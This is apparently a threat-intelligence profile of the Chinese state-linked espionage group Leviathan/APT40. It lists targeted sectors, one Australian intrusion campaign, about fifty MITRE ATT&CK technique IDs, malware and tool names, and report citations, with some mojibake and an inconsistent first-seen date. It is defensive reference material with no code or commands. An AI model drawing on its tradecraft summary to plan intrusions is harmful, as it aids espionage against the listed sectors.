Introduction
Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Securityβs (MSS) Hainan State Security Department and an affiliated front company. CISA AA21-200A APT40 July 2021 Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia. CISA AA21-200A APT40 July 2021 Proofpoint Leviathan Oct 2017 FireEye Periscope March 2018 CISA Leviathan 2024
Activities and Tactics
Targeted Sectors: Maritime, Government, Defense, Private sector
Country of Origin: π¨π³ China
Risk Level: High
First Seen: 2013
Last Activity: 2024
Incident Type: Espionage
Suspected Victims: United States, Hong Kong, The Philippines, Asia Pacific Economic Cooperation, Cambodia, Belgium, Germany, Philippines, Malaysia, Norwayβ¦
Notable Campaigns
- Leviathan Australian Intrusions (C0049): Leviathan Australian Intrusions consisted of at least two long-term intrusions against victims in Australia by Leviathan, relying on similar tradecraft such as external service exploitation followed by extensive credential capture and re-use to enable privilege escalation and lateral movement. Leviathan Australian Intrusions were focused on exfiltrating sensitive data including valid credentials for the victim organizations.(Citation: CISA Leviathan 2024)
Tactics, Techniques, and Procedures (TTPs)
- T1567.002 Exfiltration to Cloud Storage
- T1595.002 Vulnerability Scanning
- T1102.003 One-Way Communication
- T1047 Windows Management Instrumentation
- T1021.004 SSH
- T1105 Ingress Tool Transfer
- T1547.001 Registry Run Keys / Startup Folder
- T1027.013 Encrypted/Encoded File
- T1589.001 Credentials
- T1003.001 LSASS Memory
- T1586.001 Social Media Accounts
- T1090.003 Multi-hop Proxy
- T1027.001 Binary Padding
- T1583.001 Domains
- T1585.002 Email Accounts
- T1566.002 Spearphishing Link
- T1189 Drive-by Compromise
- T1546.003 Windows Management Instrumentation Event Subscription
- T1027.003 Steganography
- T1585.001 Social Media Accounts
- T1059.001 PowerShell
- T1547.009 Shortcut Modification
- T1055.001 Dynamic-link Library Injection
- T1566.001 Spearphishing Attachment
- T1584.004 Server
- T1203 Exploitation for Client Execution
- T1059.005 Visual Basic
- T1078 Valid Accounts
- T1553.002 Code Signing
- T1559.002 Dynamic Data Exchange
- T1587.004 Exploits
- T1197 BITS Jobs
- T1074.001 Local Data Staging
- T1204.002 Malicious File
- T1140 Deobfuscate/Decode Files or Information
- T1074.002 Remote Data Staging
- T1534 Internal Spearphishing
- T1190 Exploit Public-Facing Application
- T1218.010 Regsvr32
- T1041 Exfiltration Over C2 Channel
- T1505.003 Web Shell
- T1021.001 Remote Desktop Protocol
- T1584.008 Network Devices
- T1027.015 Compression
- T1560 Archive Collected Data
- T1572 Protocol Tunneling
- T1204.001 Malicious Link
- T1133 External Remote Services
- T1003 OS Credential Dumping
- T1586.002 Email Accounts
ATT&CK technique IDs (denormalized)
- T1003
- T1003.001
- T1021.001
- T1021.004
- T1027.001
- T1027.003
- T1027.013
- T1027.015
- T1041
- T1047
- T1055.001
- T1059.001
- T1059.005
- T1074.001
- T1074.002
- T1078
- T1090.003
- T1102.003
- T1105
- T1133
- T1140
- T1189
- T1190
- T1197
- T1203
- T1204.001
- T1204.002
- T1218.010
- T1505.003
- T1534
- T1546.003
- T1547.001
- T1547.009
- T1553.002
- T1559.002
- T1560
- T1566.001
- T1566.002
- T1567.002
- T1572
- T1583.001
- T1584.004
- T1584.008
- T1585.001
- T1585.002
- T1586.001
- T1586.002
- T1587.004
- T1589.001
- T1595.002
Notable Indicators of Compromise (IOCs)
No atomic indicators are listed in this profile. The APTnotes snapshot indexes 3 public reports that may contain IOCs; see Source Attribution for dataset links.
Malware and Tools
- UNITEDRAKE
- AIRBREAK:
- BADFLICK:
- PHOTO:
- HOMEFRY:
- LUNCHMONEY:
- MURKYTOP:
- China Chopper:
- Beacon:
- BLACKCOFFEE:
- CVE-2017-11882:
- Derusbi:
- RoyalRoad RTF Weaponizer:
- 8.t exploit document builder:
MITRE ATT&CK Software
- Windows Credential Editor (S0005) β tool
- BITSAdmin (S0190) β tool
- HOMEFRY (S0232) β malware
- Derusbi (S0021) β malware
- at (S0110) β tool
- BLACKCOFFEE (S0069) β malware
- BADFLICK (S0642) β malware
- Empire (S0363) β tool
- gh0st RAT (S0032) β malware
- Net (S0039) β tool
- PowerSploit (S0194) β tool
- MURKYTOP (S0233) β malware
- NanHaiShu (S0228) β malware
- Orz (S0229) β malware
- Cobalt Strike (S0154) β malware
- China Chopper (S0020) β malware
- Tor (S0183) β tool
Attribution and Evidence
Country of Origin: China Additional attribution information pending cataloguing.
References
[1] mitre-attack [10] Accenture MUDCARP March 2019 Accenture iDefense Unit. (2019, March 5). Mudcarpβs Focus on Submarine Technologies. Retrieved August 24, 2021. [11] Crowdstrike KRYPTONITE PANDA August 2018 Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021. [12] Proofpoint Leviathan Oct 2017 Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018. [13] MSTIC GADOLINIUM September 2020 Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021. [14] CISA Leviathan 2024 CISA et al. (2024, July 8). Peopleβs Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action. Retrieved February 3, 2025. [15] CISA AA21-200A APT40 July 2021 CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory β Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with Chinaβs MSS Hainan State Security Department. Retrieved August 12, 2021. [17] FireEye Periscope March 2018 FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. [18] Microsoft Threat Actor Naming July 2023 Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023. [19] FireEye APT40 March 2019 Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019. [20] SecureWorks BRONZE MOHAWK n.d. SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.